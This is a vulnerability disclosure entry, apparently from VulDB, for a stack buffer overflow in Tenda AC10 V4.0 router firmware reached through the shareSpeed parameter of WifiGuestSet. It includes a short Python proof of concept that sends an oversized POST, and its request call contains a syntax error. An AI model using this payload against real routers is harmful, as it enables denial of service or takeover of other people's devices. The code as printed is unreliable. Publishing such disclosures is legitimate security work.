Submit #322950: Tenda AC10 V4.0_V16.03.10.13 Buffer Overflowinfo

TitleTenda AC10 V4.0_V16.03.10.13 Buffer Overflow
DescriptionThis vulnerability can be remotely exploited through the network. An attacker can simply send a maliciously crafted POST request to the target server. This request contains a payload designed to overload the memory by leveraging the shareSpeed parameter. This attack is fully automated and does not require any user interaction, making it highly effective and stealthy. attack chain : WifiGuestSet->fromSetWifiGusetBasic Attack the shareSpeed variable located in the freeSetWifiGusetBasic function by requesting the WifiGuestSet function, and use the strcpy function for buffer overflow poc: import requests host = "192.168.64.1" offset = "a"*0x150 def exp(): url = f"http://{host}/goform/WifiGuestSet" data = { b'shareSpeed':offset} res = requests.post{url=url,data=data} print(res.content)
Userx1aob1n (ID 68191)
Submission2024-04-26 07:29 (1 month ago)
Moderation2024-05-04 09:14 (8 days later)
StatusDuplicate
VulDB Entry231099

Do you need the next level of professionalism?

Upgrade your account now!